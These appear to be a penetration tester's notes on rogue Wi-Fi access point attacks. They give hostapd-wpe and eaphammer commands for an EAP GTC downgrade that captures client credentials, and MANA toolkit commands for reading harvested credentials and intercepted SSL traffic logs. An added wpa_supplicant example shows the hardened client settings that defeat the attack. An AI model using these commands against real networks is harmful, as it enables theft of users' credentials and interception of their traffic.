Rogue AP and MANA

Rogue AP - EAP

hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

GTC downgrade

Efficient against Android phones.

Efficient against iOS, but it prompts the user about the certificate.

Against Windows, only a challenge-response can be captured.

Does not work if:

  • the supplicant uses certificate-based authentication (EAP-TLS), since there is no inner authentication to downgrade
  • the supplicant validates the server certificate
Balanced Approach (default)

Phase 1 (outer authentication):

PEAP,TTLS,TLS,FAST

Phase 2 (inner authentication):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
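Added example, not part of the original notes: a wpa_supplicant network block with the weak supplicant settings a rogue AP relies on (no server certificate validation, no inner-method restriction), beside the hardened form that makes the attack fail per the two conditions above. ESSID, identity, CA path and RADIUS hostname are assumed placeholders.

```conf
# Added example (not from the original notes).
# Weak profile: no ca_cert, so any server certificate is accepted,
# and no phase2 restriction, so the AP can push the inner method
# down to GTC and receive the plaintext password.
network={
    ssid="<ESSID>"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user@example.com"
    password="<password>"
}

# Hardened profile for the same network.
network={
    ssid="<ESSID>"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user@example.com"
    password="<password>"
    # Only trust the corporate RADIUS CA (assumed path); a rogue AP
    # presenting an untrusted certificate is rejected instead of
    # prompting the user.
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    # Pin the RADIUS server name (assumed hostname), so a certificate
    # issued by the same CA for another host is still rejected.
    domain_match="radius.example.com"
    # Allow only MSCHAPv2 as inner method; wpa_supplicant NAKs a GTC
    # proposal, so the downgrade cannot be negotiated.
    phase2="auth=MSCHAPV2"
}
```

On a managed fleet the same three settings (trusted CA, server name match, fixed inner method) are what an MDM or Group Policy Wi-Fi profile should enforce.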

Explicit GTC downgrade

./eaphammer --interface <wlan0> --negotiate gtc-downgrade --auth wpa-eap --essid <ESSID> --creds [--hw-mode <g/a>] [-c <channel>] [-b <BSSID>]

Rogue AP - OPEN or PSK

Mana

Mana is deprecated.
I use a custom dedicated Kali VM.

Start Mana - Custom script

/usr/share/mana-toolkit/run-mana/b00m.sh

Loot

cat /var/lib/mana-toolkit/net-creds*
cat /var/lib/mana-toolkit/sslsplit-connect*
cat /var/lib/mana-toolkit/sslstrip.log*
strings /var/lib/mana-toolkit/sslsplit/* | grep -i <keyword>